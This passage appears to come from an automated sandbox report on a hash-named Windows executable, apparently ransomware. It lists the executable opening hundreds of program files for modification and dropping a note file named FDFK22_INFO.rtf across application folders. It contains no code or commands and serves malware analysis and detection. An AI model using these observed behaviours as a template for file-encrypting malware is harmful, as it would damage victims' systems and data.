a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\et.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.security a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ShowUnregister.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\83.0.4103.106_chrome_installer.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\resources.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Ojinaga a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\elevation_service.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Brunei a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\fonts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\release a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe 